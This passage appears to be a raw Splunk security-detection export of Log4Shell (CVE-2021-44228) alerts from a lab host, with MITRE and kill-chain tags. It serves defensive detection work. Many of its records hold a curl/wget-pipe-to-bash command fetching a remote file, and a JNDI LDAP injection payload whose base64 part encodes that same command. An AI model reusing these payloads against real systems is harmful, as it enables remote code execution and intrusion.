annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645755, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645752, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was actually successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645755, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645752, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was an attempt at an injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was actually successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
